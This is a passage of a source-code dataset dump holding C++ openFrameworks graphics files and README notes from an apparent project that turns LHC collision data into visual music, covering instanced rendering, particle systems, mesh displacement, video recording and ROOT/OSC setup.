yNoiseAmp*Orient.x);\n shaderInst.setUniform1f(\"uYnoiseRug\", yNoiseRug);\n \n shaderInst.setUniform1f(\"uZnoiseFreq\", zNoiseFreq);\n shaderInst.setUniform1f(\"uZnoiseAmp\", zNoiseAmp*Orient.x);\n shaderInst.setUniform1f(\"uZnoiseRug\", zNoiseRug);\n \n vboMesh.drawInstanced(OF_MESH_FILL, _hRes * _vRes);\n \n\tshaderInst.end();//------------------------------------\n material.end();\n \n\t\n //----\n velCounter+=velX;\n \n ofPopMatrix();\n \n ofPopStyle();\n \n \n}\n\n\n//--------------------------------------\nvoid InstancedManager::setCubeSize(float val){\n\n cubeSize = val;\n\n ofBoxPrimitive tmpBox;\n tmpBox.set(cubeSize);// set the size\n vboMesh = tmpBox.getMesh();\n \n// ofSpherePrimitive tmpSph;\n// tmpSph.set(cubeSize, 10);\n// vboMesh = tmpSph.getMesh();\n\n \n}\n//--------------------------------------\nvoid InstancedManager::setCubeSize(ofVec3f size){\n ofBoxPrimitive tmpBox;\n tmpBox.set(size.x, size.y, size.z);\n vboMesh = tmpBox.getMesh();\n}\n//--------------------------------------\nvoid InstancedManager::setupGui(){\n\n guiInstanced.setup(\"instanced\");\n guiInstanced.setPosition(0,300);\n guiInstanced.add(gMode.setup(\"LINEAL/RADIAL\", true));\n guiInstanced.add(gRadMode.setup(\"Concentric/Centrifuge\", false));\n guiInstanced.add(gRadDeform.setup(\"Radial Mix\", 0.0, 0.0, 1.0));\n \n \n guiInstanced.add(gWidth.setup(\"width\", 1.0, 0., 1.0));\n guiInstanced.add(gHeight.setup(\"height/radius\", 0.36, 0., 3.0));\n guiInstanced.add(gCubesizeUnified.setup(\"cubesize\", 0.15, 0., 1.0));\n guiInstanced.add(gMaskRadius.setup(\"maskRadius\", 0.16, 0.0, 1.0));\n guiInstanced.add(gHres.setup(\"Hres\", 1.0, 0., 1.0));\n guiInstanced.add(gVres.setup(\"Vres\", 1.0, 0., 1.0));\n guiInstanced.add(gXpos.setup(\"Xpos\", 0.0, 0., 1.0));\n guiInstanced.add(gYpos.setup(\"Ypos\", 0.0, 0., 1.0));\n guiInstanced.add(gZpos.setup(\"Zpos\", 0.0, -3000.0, 0.0));\n guiInstanced.add(gVelocity.setup(\"velocity\", 0.1, 0., 1.0));\n //nz\n guiInstanced.add(gNzTime.setup(\"nzTime\", 0.1, 0.0, 1.0));\n \n guiInstanced.add(gNzXAmp.setup(\"nzXAmp\", 0.0, 0.0, 1.0));\n guiInstanced.add(gNzXFreq.setup(\"nzXFreq\", 0.395, 0.0, 1.0));\n guiInstanced.add(gNzXRug.setup(\"nzXRug\", 0.1, 0.01, 1.0));\n \n guiInstanced.add(gNzYAmp.setup(\"nzYAmp\", 0.0, 0.0, 1.0));\n guiInstanced.add(gNzYFreq.setup(\"nzYFreq\", 0.5, 0.0, 1.0));\n guiInstanced.add(gNzYRug.setup(\"nzYRug\", 2.0, 0.01, 30.0));\n \n guiInstanced.add(gNzZAmp.setup(\"nzZAmp\", 0.14, 0.0, 1.0));\n guiInstanced.add(gNzZFreq.setup(\"nzZFreq\", 0.2, 0.0, 1.0));\n guiInstanced.add(gNzZRug.setup(\"nzZRug\", 0.05, 0.01, 1.0));\n}\n//--------------------------------------\nvoid InstancedManager::drawGui(){\n guiInstanced.draw();\n}\n\n\n\n" }, { "alpha_fraction": 0.44998395442962646, "alphanum_fraction": 0.4773966073989868, "avg_line_length": 27.746543884277344, "blob_id": "2c1162cb583f5bc2bf1fbdc569fb43adc350d184", "content_id": "1eac2745f4e0d339ab0ff03bf5c98e07c4ed2ec9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6240, "license_type": "no_license", "max_line_length": 118, "num_lines": 217, "path": "/Graphics/examples/rendererExample/src/ofApp.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "ISO-8859-10", "text": "#include \"ofApp.h\"\n\n//--------------------------------------------------------------\nvoid ofApp::setup(){\n \n ofSetFrameRate(FRAME_RATE);\n ofSetLogLevel(OF_LOG_VERBOSE);\n \n ofBackground(50);\n \n renderer.setup(FRAME_RATE, PNG_SEQUENCE, r1024);\n \n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.05, true, true);\n \n lastTimeMarker = 0.0;\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::update(){\n \n //dibujar contexto openGL en el fbo del renderer\n renderer.getFbo()->begin();\n ofClear(255);\n drawTestScene(renderer.getFboWidth(), renderer.getFboHeight());\n renderer.getFbo()->end();\n \n //grabar fbo en archivo png o frame del .mov\n renderer.update();\n}\n\n//--------------------------------------------------------------\nvoid ofApp::draw(){\n \n //preview del fbo del renderer escalado----\n renderer.draw(250, 0, 512, 512);\n\n //recording indicator-------------------\n if(renderer.getIsRecording()){\n ofPushStyle();\n ofSetColor(255, 0, 0);\n ofDrawCircle(ofGetWidth() - 60, 60, 40);\n ofPopStyle();\n }\n \n //draw key commands-----------------\n ofPushStyle();\n string keys = \"KEY COMMANDS:\";\n keys += \"\\nSpacebar: START/STOP Recording\"\n \"\\np: Secuencia Png\"\n \"\\nm: Archivo MOV-H264\"\n \"\\n1: 256x256\"\n \"\\n2: 512x512\"\n \"\\n3: 1024x1024\"\n \"\\n4: 2048x2048\"\n \"\\n5: 4096x4096\"\n ;\n ofSetColor(ofColor::white);\n ofDrawBitmapString(keys, 10, 20);\n ofPopStyle();\n \n //draw info-----------------\n ofPushStyle();\n string info = \"INFO: \";\n info += \"\\nfps: \"+ofToString(ofGetFrameRate())\n + \"\\nFBO output res: \" + renderer.getResolutionAsString()\n + \"\\nREC mode: \" + renderer.getRecordingModeAsString();\n if(renderer.getIsRecording()){\n info += \"\\nRECORDING FRAME NUM: \" + ofToString(ofGetFrameNum() - renderer.getLastFrameMarker());\n }\n ofSetColor(ofColor::yellow);\n ofDrawBitmapString(info, 10, ofGetHeight()-100);\n ofPopStyle();\n\n}\n//--------------------------------------------------------------\nvoid ofApp::exit(){\n renderer.exit();\n}\n\n//--------------------------------------------------------------\nvoid ofApp::drawTestScene(int w, int h){\n \n ofPushMatrix();\n ofPushStyle();\n ofTranslate(w * .5, h * .5);\n ofSetColor(ofColor::blue);\n float radius = w * 0.25 + w * 0.15 * sin(ofGetFrameNum()*0.1);//animacion dependiente del nž de frame\n ofFill();\t\t// draw \"filled shapes\"\n ofDrawCircle(0,0,radius);\n ofSetRectMode(OF_RECTMODE_CENTER);\n ofRotate(int (ofGetFrameNum()*2)% 360);//animacion dependiente del nž de frame\n ofSetColor(ofColor::green, 150);\n ofRect(0,0, w*0.4, w*0.4);\n ofPopStyle();\n ofPopMatrix();\n \n if(renderer.getIsRecording()){\n ofSetColor(ofColor::red);\n verdana.drawString(ofToString(ofGetElapsedTimef()-lastTimeMarker),w*.4, h*.5);\n }\n \n}\n\n//--------------------------------------------------------------\nvoid ofApp::keyPressed(int key){\n \n switch (key) {\n //start-stop recording\n case ' ':\n if(!renderer.getIsRecording()){\n renderer.startRecording();\n lastTimeMarker = ofGetElapsedTimef();//para medir el tiempo transcurrido desde que se empieza a grabar\n }else{\n renderer.stopRecording();\n }\n break;\n \n //change resolution\n case '1':\n if(renderer.getOutputResolution()!= r256){\n renderer.setOutputResolution(r256);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.05, true, true);\n }\n break;\n case '2':\n if(renderer.getOutputResolution()!= r512){\n renderer.setOutputResolution(r512);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.05, true, true);\n }\n break;\n case '3':\n if(renderer.getOutputResolution()!= r1024){\n renderer.setOutputResolution(r1024);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.05, true, true);\n }\n break;\n case '4':\n if(renderer.getOutputResolution()!= r2048){\n renderer.setOutputResolution(r2048);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.05, true, true);\n }\n break;\n case '5':\n if(renderer.getOutputResolution()!= r4096){\n renderer.setOutputResolution(r4096);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.05, true, true);\n }\n break;\n \n //change recording mode\n case 'p':\n if(renderer.getRecordingMode()!=PNG_SEQUENCE) renderer.setRecordingMode(PNG_SEQUENCE);\n break;\n case 'm':\n if(renderer.getRecordingMode()!=MOV_FILE) renderer.setRecordingMode(MOV_FILE);\n break;\n \n \n \n default:\n break;\n }\n \n \n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::keyReleased(int key){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseMoved(int x, int y ){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseDragged(int x, int y, int button){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mousePressed(int x, int y, int button){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseReleased(int x, int y, int button){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseEntered(int x, int y){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseExited(int x, int y){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::windowResized(int w, int h){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::gotMessage(ofMessage msg){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::dragEvent(ofDragInfo dragInfo){ \n\n}\n" }, { "alpha_fraction": 0.46594446897506714, "alphanum_fraction": 0.48512014746665955, "avg_line_length": 26.216949462890625, "blob_id": "f99a31e369b174baf689622eab6b90bbc8d6f599", "content_id": "f72ef1aa3edda1fdc3cb452d06a90d7fe5793897", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 8031, "license_type": "no_license", "max_line_length": 119, "num_lines": 295, "path": "/Graphics/apps/final/src/particleSystem/ParticleSystemPair.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n#include \"ParticleSystemPair.h\"\n//----------------------------------------------------------\n\nvoid ParticleSystemPair::setup(int x, int y, int w, int h, PairType type){\n \n _x = x;\n _y = y;\n _w = w;\n _h = h;\n \n _type = type;\n \n \n system_1.setup(_x, _y, _w, _h, 1);\n system_2.setup(_w, _y, _w, _h, -1);\n \n _distanceTreshold = 100.0;\n _groupPartsNum = 3;\n\n ofLogVerbose()<<\"ParticleSystemPair setup: Loading lineShader:\";\n lineShader.setGeometryInputType(GL_LINES);\n lineShader.setGeometryOutputType(GL_TRIANGLE_STRIP);\n lineShader.setGeometryOutputCount(24);\n lineShader.load(\"bosque/shaders/cubeLines.vert\", \"bosque/shaders/cubeLines.frag\", \"bosque/shaders/cubeLines.geom\");\n //-------------\n ofLogVerbose()<<\"ParticleSystemPair setup: Loading phongShader:\";\n phongShader.load(\"bosque/shaders/phong.vert\",\"bosque/shaders/phong.frag\" );\n //-------------\n \n \n continuumTimer = 0.0;\n lastTimer = 0.0;\n _continuum_rate_ms = 500.0;\n \n material.setShininess(100);\n \n \n}\n//----------------------------------------------------------\nvoid ParticleSystemPair::update(std::map<string, float>& data1, std::map<string, float>& data2){\n \n system_1.update(data1);\n system_2.update(data2);\n \n _groupPartsNum = data1.at(KEY_PARTS_NUM);\n \n //automatic add parts\n int rate = data1.at(KEY_PARTS_RATE);\n int frame = ofGetFrameNum();\n \n if (frame%rate == 0){\n \n system_1.addParticlesGroup(_groupPartsNum);\n system_2.addParticlesGroup(_groupPartsNum);\n \n }\n \n \n}\n//----------------------------------------------------------\nvoid ParticleSystemPair::drawScene(){\n\n material.begin();\n \n checkAndDrawGroupUnions();\n \n system_1.drawParticles();\n system_2.drawParticles();\n \n material.end();\n \n}\n\n//----------------------------------------------------------\nvoid ParticleSystemPair::checkAndDrawGroupUnions(){\n \n \n \n for(int i=0; i<system_1.partGroups.size(); i++){\n \n auto group1 = system_1.partGroups[i];\n \n for(int j=0; j<system_2.partGroups.size(); j++){\n \n auto group2 = system_2.partGroups[j];\n \n float distance = group1->getAnchorPos().distance(group2->getAnchorPos());\n \n if(distance < _distanceTreshold){\n \n if (_type == IN){\n drawSolidMesh(group1, group2);\n }else if(_type == OUT){\n drawLineStructure(group1, group2);\n }\n \n }\n }\n \n }\n\n}\n//----------------------------------------------------------\nvoid ParticleSystemPair::drawSolidMesh(ParticleGroup *group1, ParticleGroup *group2){\n \n vector<ofMeshFace> faces;\n \n ofMeshFace face;\n ofMesh mesh;\n \n //each group1 vert with all group2 vert\n for (int i=0; i<group1->positions.size(); i++){\n for(int j=0; j<group2->positions.size()-1; j++){\n \n \n ofVec3f normal;\n \n ofVec3f vec = group1->positions[i];\n face.setVertex(0, vec);\n normal = vec.cross(group1->getAnchorPos());\n normal.normalize();\n face.setNormal(0, normal);\n \n vec = group2->positions[j];\n face.setVertex(1, vec);\n normal = vec.cross(group2->getAnchorPos());\n normal.normalize();\n face.setNormal(1, normal);\n \n vec = group2->positions[j+1];\n face.setVertex(2, vec);\n normal = vec.cross(group2->getAnchorPos());\n normal.normalize();\n face.setNormal(2, normal);\n \n faces.push_back(face);\n\n }\n }\n //each group2 vert with all group1 vert\n for (int i=0; i<group2->positions.size(); i++){\n for(int j=0; j<group1->positions.size()-1; j++){\n \n ofVec3f normal;\n \n ofVec3f vec = group2->positions[i];\n face.setVertex(0, vec);\n normal = vec.cross(group2->getAnchorPos());\n normal.normalize();\n face.setNormal(0, normal);\n \n vec = group1->positions[j];\n face.setVertex(1, vec);\n normal = vec.cross(group1->getAnchorPos());\n normal.normalize();\n face.setNormal(1, normal);\n \n vec = group1->positions[j+1];\n face.setVertex(2, vec);\n normal = vec.cross(group1->getAnchorPos());\n normal.normalize();\n face.setNormal(2, normal);\n \n faces.push_back(face);\n }\n \n }\n //set mesh faces\n mesh.setFromTriangles(faces);\n //mesh.setMode(OF_PRIMITIVE_TRIANGLE_FAN);\n\n //--------------------------------------\n \n ofPushStyle();\n\n ofFill();\n \n \n \n \n phongShader.begin();\n \n mesh.draw();\n \n phongShader.end();\n\n ofPopStyle();\n\n}\n//----------------------------------------------------------\nvoid ParticleSystemPair::drawLineStructure(ParticleGroup *group1, ParticleGroup *group2){\n \n vector<ofMeshFace> faces;\n \n ofMeshFace face;\n ofMesh mesh;\n \n //each group1 vert with all group2 vert\n for (int i=0; i<group1->positions.size(); i++){\n for(int j=0; j<group2->positions.size()-1; j++){\n \n face.setVertex(0, group1->positions[i]);\n face.setVertex(1, group2->positions[j]);\n face.setVertex(2, group2->positions[j+1]);\n \n faces.push_back(face);\n \n }\n }\n //each group2 vert with all group1 vert\n for (int i=0; i<group2->positions.size(); i++){\n for(int j=0; j<group1->positions.size()-1; j++){\n \n face.setVertex(0, group2->positions[i]);\n face.setVertex(1, group1->positions[j]);\n face.setVertex(2, group1->positions[j+1]);\n \n faces.push_back(face);\n }\n \n }\n //set mesh faces\n mesh.setFromTriangles(faces);\n \n //--------------------------------------\n \n ofPushStyle();\n \n ofFill();\n \n lineShader.begin();\n lineShader.setUniform1f(\"thickness\", 0.002*_w);\n \n //mesh.drawWireframe();\n int numVertex = mesh.getNumVertices();\n \n GLfloat vertexes[numVertex * 3];//array of floats (numVertex *3) 3->x,y,z\n int i=0;\n for(float n=0; n<mesh.getNumVertices(); n++) {\n ofVec3f vec\t\t\t= mesh.getVertices()[n];\n vertexes[i*3]\t\t= vec.x;\n vertexes[(i*3)+1] = vec.y;\n vertexes[(i*3)+2] = vec.z;\n i++;\n }\n glEnableClientState(GL_VERTEX_ARRAY);\n glVertexPointer(3, GL_FLOAT, 0, vertexes);\n glDrawArrays(GL_LINE_STRIP, 0, numVertex);\n \n lineShader.end();\n \n ofPopStyle();\n \n}\n\n//----------------------------------------------------------\nvoid ParticleSystemPair::addPartGroup(int ch){\n \n if(ch==1){\n system_1.addParticlesGroup(_groupPartsNum);\n }else if (ch==2){\n system_2.addParticlesGroup(_groupPartsNum);\n }\n \n}\n\n//----------------------------------------------------------\nvoid ParticleSystemPair::setIsContinuum(bool state, float rate_ms){\n \n _bIsContinuum = state;\n _continuum_rate_ms = rate_ms;\n \n}\n//----------------------------------------------------------\nvoid ParticleSystemPair::reset(int x, int y, int w, int h){\n \n _x = x;\n _y = y;\n _w = w;\n _h = h;\n \n system_1.setup(_x, _y, _w, _h, 1);\n system_2.setup(_w, _y, _w, _h, -1);\n\n}\n//----------------------------------------------------------\nint ParticleSystemPair::getPartsNum(){\n \n return system_1.partGroups.size() + system_2.partGroups.size();\n}\n//----------------------------------\nvoid ParticleSystemPair::setColor(ofColor col){\n _mainColor = col;\n material.setDiffuseColor(_mainColor);//??? es diffuse el que va?\n}\n\n" }, { "alpha_fraction": 0.7858293056488037, "alphanum_fraction": 0.7890499234199524, "avg_line_length": 43.28571319580078, "blob_id": "b4abb670ba2ff9b85cfb7d5b4c18b5b1966f4e06", "content_id": "c7cf4412848090d2e3ce66e63d7b1e72516bd7ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 621, "license_type": "no_license", "max_line_length": 229, "num_lines": 14, "path": "/Graphics/examples/rendererExample/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#VideoRenderer Example\n\n###Description\nExample app of the VideoRenderer class. It renders the openGL context into a .mov video file or a PNG sequence.\n\n###Dependencies\n* addons: ofxVideoRecorder.\n* common_classes: VideoRenderer, ImageSaverThread.\n\n### Compilation\nThe Graphics Engine of the LHCVMM is developed using openFrameworks v0.9 (www.openFrameworks.com). To compile the examples in this repository you need to clone lhcvmm main directory into OF root dir (OF_ROOT_DIR/lhcvmm/Graphics/)\n\n### Running this examples\nMake sure `ffmpeg` is installed and on your PATH for VideoRenderer to work as it relies on ffmpeg. \n" }, { "alpha_fraction": 0.48721766471862793, "alphanum_fraction": 0.5043435096740723, "avg_line_length": 25.15584373474121, "blob_id": "e274754e428037f0113509af56240279c4a715d9", "content_id": "e095594fca9b82397defdd34e97b86c2bd0528fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4029, "license_type": "no_license", "max_line_length": 105, "num_lines": 154, "path": "/Graphics/apps/final/src/particleSystem/ParticleGroup.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n\n#include \"ParticleGroup.h\"\n\n\n//-----------------------------------------\n\nParticleGroup::ParticleGroup(int partsNum,int x, int y, int w, int d, float radiusInit, float angleInit){\n \n _w = w;\n //_x = w/2;\n _x = x;\n _y = y;\n _z = 0;\n \n _anchor.set(_x, _y, _z);\n \n \n _dir = d;\n _partsNum = partsNum;\n \n _size = 10;\n \n if(_dir <0)\n _angle = 0.0;//starts from right\n else\n _angle = ofDegToRad(180.0);//starts from the left\n \n \n _rotRadiusInit = ofRandom(-radiusInit, radiusInit);\n _rotAngleInit = ofRandom(-angleInit, angleInit);\n \n for(int i=0; i<_partsNum ; i++){\n ofVec3f pos(_x, _y, _z);\n ofVec3f vel(0,0,0);\n positions.push_back(pos);\n velocities.push_back(vel);\n }\n\n frameCounter = 0;\n \n}\n//-----------------------------------------\nvoid ParticleGroup::update(std::map<string, float>& data){\n \n float time = 0.03;\n \n \n float velocityX = data.at(KEY_X_VELOCITY);\n float velocityZ = velocityX;\n float angleVar = data.at(KEY_ANGLE_VAR);\n float radiusVar = data.at(KEY_RADIUS_VAR);\n //nz\n float amp_nzAngle = data.at(KEY_ANGLE_NZ_AMP);//0-2;\n float freq_nzAngle = data.at(KEY_ANGLE_NZ_FREQ); //0.001 - 0.01\n float amp_nzRad = data.at(KEY_RADIUS_NZ_AMP);//0-2\n float freq_nzRad = data.at(KEY_RADIUS_NZ_FREQ); //1.0- 10\n float amp_nzXpos = data.at(KEY_X_NZ_AMP);//0-ofgetWidth\n float freq_nzXpos = data.at(KEY_X_NZ_FREQ); //0.01 - 0.1\n \n _size = data.at(KEY_PART_SIZE);\n \n \n //anchor---------------------\n _angle += time * _dir * _rotAngleInit + angleVar;\n float radiusAnchor = (_w/2) - 100 ;\n \n \n _anchor.x += _dir * time * velocityX;\n \n _anchor.y = _y + radiusAnchor * sin(_angle);\n \n float radiusParts = _rotRadiusInit + radiusVar;\n \n \n \n //set x,y,z\n for(int i=0; i<_partsNum; i++){\n \n float thisAngle = _angle + ofDegToRad( (360.0/float(_partsNum)) * i);\n float thisRadius = radiusParts;\n float thisZpos = _anchor.x;\n \n //nz-------------------------\n float elapsedTimeFramed = frameCounter * time;\n float nzAngle = ofSignedNoise(elapsedTimeFramed * freq_nzAngle, i*0.1) * thisAngle * amp_nzAngle;\n thisAngle += nzAngle;\n \n float nzRadius = ofNoise(thisAngle * freq_nzRad) * radiusParts * amp_nzRad;\n thisRadius += nzRadius;\n \n float nzZpos = ofSignedNoise(thisAngle * freq_nzXpos) * amp_nzXpos;\n thisZpos += nzZpos;\n \n \n //-------------------------------------------\n \n velocities[i].z = thisRadius * cos(thisAngle);\n velocities[i].y = thisRadius * sin(thisAngle);\n \n positions[i].z = _anchor.z + velocities[i].z;\n \n positions[i].y = _anchor.y + velocities[i].y;\n positions[i].x = thisZpos;\n \n }\n\n\n \n frameCounter++;\n \n}\n//-----------------------------------------\nvoid ParticleGroup::draw(){\n\n ofPushStyle();\n \n \n \n for(int i=0; i<positions.size(); i++){\n //ofDrawBox(positions[i],_size);\n ofDrawSphere(positions[i], _size);\n }\n\n //for lines--------\n \n// int numVertex = positions.size();\n// \n// GLfloat vertexes[numVertex * 3];//array of floats (numVertex *3) 3->x,y,z\n// int i=0;\n// for(float n=0; n<positions.size(); n++) {\n// ofVec3f vec\t\t\t= positions[n];\n// vertexes[i*3]\t\t= vec.x;\n// vertexes[(i*3)+1] = vec.y;\n// vertexes[(i*3)+2] = vec.z;\n// i++;\n// }\n// glEnableClientState(GL_VERTEX_ARRAY);\n// glVertexPointer(3, GL_FLOAT, 0, vertexes);\n// ///glDrawArrays(GL_LINE_STRIP, 0, numVertex);\n// glDrawArrays(GL_LINE_LOOP, 0, numVertex);\n \n \n ofPopStyle();\n}\n//-----------------------------------------\nbool ParticleGroup::isOutOfBounds(int x_min, int x_max){\n \n bool b = false;\n \n if(_anchor.z<x_min|| _anchor.z>x_max){\n b = true;\n }\n \n return b;\n}" }, { "alpha_fraction": 0.4886685609817505, "alphanum_fraction": 0.523472249507904, "avg_line_length": 32.174495697021484, "blob_id": "1ab4c91aba678545a01801d966fb8b20bada86f7", "content_id": "345444de33fec10ea8e3e074ac801fc7dbc19fe8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4942, "license_type": "no_license", "max_line_length": 145, "num_lines": 149, "path": "/Graphics/apps/videoTest_3/src/cubeMesh/DisplacementSphereMesh.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n#include \"ofMain.h\"\n\nclass DisplacementSphereMesh {\n\t\npublic:\n \n // From GUI\n //float positionX;\n //float positionY;\n \n //OSC\n //bool isPlaying;\n //float touch_power;\n \n // Mesh\n ofLight light;\n\tofEasyCam cam;\n\tofVboMesh mainMesh;\n \n float *depths;\n float *speeds;\n float *forces;\n \n ofSpherePrimitive sphere;\n \n void setup() {\n sphere.setMode( OF_PRIMITIVE_TRIANGLES );\n sphere.setRadius(150);\n //sphere.setResolution(96);\n sphere.setResolution(48);\n mainMesh = sphere.getMesh();\n //mainMesh.enableColors();\n depths = new float[sphere.getMesh().getNumVertices()];\n speeds = new float[sphere.getMesh().getNumVertices()];\n forces = new float[sphere.getMesh().getNumVertices()];\n for (int i = 0; i < sphere.getMesh().getNumVertices(); i++) {\n depths[i] = sphere.getMesh().getVertices()[i].length();\n speeds[i] = 0;\n forces[i] = 0;\n }\n }\n \n void update() {\n update(0.5, 0.5, 0.01);\n }\n \n void update(float mouseX, float mouseY, float volume, int curentFrame = -1) {\n mainMesh = sphere.getMesh();\n float time = .02 * ofGetFrameNum();\n if (curentFrame != -1) time = 0.02 * curentFrame;\n float index = 1.0 * (ofGetFrameNum()) / 20;\n for (int i = 0; i < mainMesh.getNumVertices(); i++) {\n ofVec3f v = mainMesh.getVertex(i);\n float displace = ofNoise(v.x * 1.1 * mouseX * (0.02 + volume), v.y * 2.1 * mouseX * (0.02 + volume), time * 1.2 + 30 + 2. * volume);\n displace += 10.0 * ofNoise(v.x * 0.01, v.y * 0.01, time * .3) * 1.0 * volume;\n v = v + mainMesh.getNormal(i) * displace * (0.01 + volume * volume) * 10000. * mouseY;\n mainMesh.setVertex(i, v);\n }\n setNormals(mainMesh);\n }\n \n void update(float mouseX, float mouseY, float volume, float radius, float resolution, int curentFrame = -1) {\n // sphere.setRadius(radius);\n ofSpherePrimitive sph = sphere;\n sphere.setRadius(radius);\n sphere.setResolution(resolution);\n mainMesh = sphere.getMesh();\n \n float time = .02 * ofGetFrameNum();\n if (curentFrame != -1) time = 0.02 * curentFrame;\n float index = 1.0 * (ofGetFrameNum()) / 20;\n for (int i = 0; i < mainMesh.getNumVertices(); i++) {\n ofVec3f v = mainMesh.getVertex(i);\n float displace = ofNoise(v.x * 1.1 * mouseX * (0.02 + volume), v.y * 2.1 * mouseX * (0.02 + volume), time * 1.2 + 30 + 2. * volume);\n displace += 10.0 * ofNoise(v.x * 0.01, v.y * 0.01, time * .3) * 1.0 * volume;\n v = v + mainMesh.getNormal(i) * displace * (0.01 + volume * volume) * 10000. * mouseY;\n mainMesh.setVertex(i, v);\n }\n setNormals(mainMesh);\n }\n \n void draw(bool triagles = false, bool type = false) {\n //ofSetHexColor(0xffffff);\n ofSetColor(255,150,100);\n ofPushMatrix();\n ofRotate(180, 0, 1, 0);\n if (type == true) ofRotate(180, 0, 1, 0);\n if (!triagles)\n mainMesh.drawFaces();\n \n ofSetHexColor(0x333333);\n ofSetLineWidth(1.0);\n ofEnableSmoothing();\n if (triagles)\n mainMesh.drawWireframe();\n ofSetHexColor(0xffffff);\n ofPopMatrix();\n }\n \n \n \n \n \n //Universal function which sets normals for the triangle mesh\n void setNormals( ofMesh &mesh ){\n \n //The number of the vertices\n int nV = mesh.getNumVertices();\n \n //The number of the triangles\n int nT = mesh.getNumIndices() / 3;\n \n vector<ofPoint> norm( nV ); //Array for the normals\n \n //Scan all the triangles. For each triangle add its\n //normal to norm's vectors of triangle's vertices\n for (int t=0; t<nT; t++) {\n \n //Get indices of the triangle t\n int i1 = mesh.getIndex( 3 * t );\n int i2 = mesh.getIndex( 3 * t + 1 );\n int i3 = mesh.getIndex( 3 * t + 2 );\n \n //Get vertices of the triangle\n const ofPoint &v1 = mesh.getVertex( i1 );\n const ofPoint &v2 = mesh.getVertex( i2 );\n const ofPoint &v3 = mesh.getVertex( i3 );\n \n //Compute the triangle's normal\n //!!!formula para calcular normales\n ofPoint dir = -( (v2 - v1).crossed( v3 - v1 ) ).normalized();\n \n //Accumulate it to norm array for i1, i2, i3\n norm[ i1 ] += dir;\n norm[ i2 ] += dir;\n norm[ i3 ] += dir;\n }\n \n //Normalize the normal's length\n for (int i=0; i<nV; i++) {\n norm[i].normalize();\n }\n \n //Set the normals to mesh\n mesh.clearNormals();\n mesh.addNormals( norm );\n }\n};" }, { "alpha_fraction": 0.7747554779052734, "alphanum_fraction": 0.7750611305236816, "avg_line_length": 34.182796478271484, "blob_id": "f0f62593295b1fe6389a7477642cab624b3d1cf2", "content_id": "ce17f571dc1abadcfd64a1ec741110a996d137f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3272, "license_type": "no_license", "max_line_length": 719, "num_lines": 93, "path": "/Data/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "# lhcvmm\nLarge Hadron Collider Visual Music Machine - Data layer\n\nThis python program drives ATLAS collisions data through OSC to both openFrameworks and SuperCollider.\nIt could also be posible to have other \"interpreters\" in the future listening to the same messages (like some arduino based machine)\n\n## Directory Structure\n\n* data_files: Here is where you download ROOT data files. They are excluded from repository to keep it slim.\n\n\n## Getting started\n\nTo get this working you should have ROOT framework with pyROOT binding enabled on your machine.\nAlthough if you don't, the program will simulate some random data to let you have a quick and dirty test.\n\n\n### Installing ROOT\n\nYou can, of course, build it yourself. But CERN provides binaries here: https://root.cern.ch/downloading-root\nOnce installed, source it in your terminal to have ROOT executables available on your PATH.\n\n```bash\n\ncd /path/to/ROOT/ && source bin/thisroot.sh\n\n```\n\n### Check Installation\n\nCheck root is available by typing:\n\n```bash\n\nroot\n.q #to quit\n\n```\n\nCheck python binding (pyROOT):\n\n```bash\n\npython -c 'import ROOT'\n\n```\nIf you receive a message like `ImportError: No module named ROOT` you have not pyROOT properly installed.\n\n### Starting the OSC listener\n\n`receiveOsc.sde` file will serve you as an example of getting OSC messages from this program.\nOpen it in SuperCollider before running this program.\n\n### Starting the program\n\nSimply execute\n\n```bash\n\npython lhcvmm.py\n\n```\n\n\n## Troubleshooting\n\nYou may have `libPyROOT.so` compiled with a different version of python that the one you use to run `lhcvmm.py`.\nIn that case, find out which version of python you should be using to match `libPyROOT.so` one.\n\nOSX:\n$ otool -L /path/to/ROOT/lib/libPyROOT.so\n\nLinux:\n$ ldd /path/to/ROOT/lib/libPyROOT.so\n\n\n### To Do\n\nInstead of sending messages to a single server, will work on a subscrition/unsubscription pattern.\n\nthe OSCMultiClient supports:\n\n* Sending a specific OSC-message to multiple remote servers\n* Remote server subscription / unsubscription (through OSC-messages, of course)\n* Message-address filtering.\n\n-------------------\n\nThe OSCMultiClient supports 'multiple unicasting' of OSC-messages. This means that a given OSC-message can be sent to multiple servers, each with their own IP-address. This is different from sending OSC-messages to a specific multicast or broadcast IP-address (which is also supported, of course). If you want to have multiple clients controlling, and receiving replies from, one OSC-server, it's difficult to say which approach, multiple-unicast, multicast or broadcast, is 'best'. This depends mostly on your network-topology. multicasting is not supported by all routers, and broadcasting generally only works within your local subnet, but 